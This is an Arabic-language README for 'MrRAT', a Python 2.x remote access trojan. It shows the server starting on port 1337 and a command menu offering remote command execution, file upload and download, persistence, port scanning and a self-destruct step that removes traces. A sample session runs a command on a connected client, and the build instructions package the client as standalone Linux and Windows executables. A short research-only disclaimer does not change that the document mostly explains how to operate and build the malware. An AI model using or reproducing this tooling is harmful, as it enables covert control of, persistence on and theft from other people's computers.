
🐭 هذا هو حصان طروادة للوصول عن بُعد (RAT) متعدد المنصات ومكتوب بلغة Python 2.x
هذا هو حصان طروادة للوصول عن بُعد (RAT) متعدد المنصات يعمل بلغة Python 2.x، تم إنشاء MrRAT للحفاظ على تصميم نظيف ومتكامل لحصان طروادة بلغة Python. لا يزال قيد التطوير ويتم العمل عليه بنشاط.
إخلاء مسؤولية: هذا البرنامج لأغراض البحث فقط، ويجب استخدامه فقط على الأنظمة المصرح بها. الوصول إلى نظام حاسوبي أو شبكة دون إذن أو تصريح صريح غير قانوني.
$ python MrRAT_server.py --port 1337
/$$ /$$ /$$$$$$$ /$$$$$$ /$$$$$$$$
| $$$ /$$$ | $$__ $$ /$$__ $$|__ $$__/
| $$$$ /$$$$ /$$$$$$ | $$ \ $$| $$ \ $$ | $$
| $$ $$/$$ $$ /$$__ $$| $$$$$$$/| $$$$$$$$ | $$
| $$ $$$| $$| $$ \__/| $$__ $$| $$__ $$ | $$
| $$\ $ | $$| $$ | $$ \ $$| $$ | $$ | $$
| $$ \/ | $$| $$ | $$ | $$| $$ | $$ | $$
|__/ |__/|__/ |__/ |__/|__/ |__/ |__/
, .
(\,;,/)
(o o)\//,
\ / \,
`+'( ( \ )
// \ |_./
'~' '~----'
https://github.com/user696/MrRAT
MrRAT server listening for connections on port 1337.
[?] MrRAT> help
client <id> - Connect to a client.
clients - List connected clients.
download <files> - Download file(s).
execute <command> - Execute a command on the target.
help - Show this help menu.
kill - Kill the client connection.
persistence - Apply persistence mechanism.
quit - Exit the server and end all client connections.
scan <ip> - Scan top 25 ports on a single host.
selfdestruct - Remove all traces of the RAT from the target system.
survey - Run a system survey.
unzip <file> - Unzip a file.
upload <files> - Upload files(s).
wget <url> - Download a file from the web.
[?] MrRAT> clients
ID - Client Address
1 - 127.0.0.1
[?] MrRAT> client 1
[1] MrRAT> execute uname -a
Linux sandbox3 4.8.13-1-ARCH #1 SMP PREEMPT Fri Dec 9 07:24:34 CET 2016 x86_64 GNU/Linux
ضع في اعتبارك أنه قبل البناء، ستحتاج على الأرجح إلى تعديل كلا المتغيرين HOST و PORT الموجودين في أعلى MrRAT_client.py ليتناسبا مع احتياجاتك.
على لينكس ستحتاج إلى Python 2.x و PyInstaller و pycrypto. ثم قم بتشغيل شيء مثل pyinstaller2 --onefile MrRAT_client.py وسيتم إنشاء مجلد dist/ يحتوي على ملف تنفيذي ELF مستقل.
على ويندوز ستحتاج إلى Python 2.x و PyInstaller و pycrypto و pywin32 و pefile. ثم قم بتشغيل شيء مثل C:\path\to\PyInstaller-3.2\PyInstaller-3.2\pyinstaller.py --onefile MrRAT_client.py وسيتم إنشاء مجلد dist/ يحتوي على ملف تنفيذي PE (منفذ) مستقل.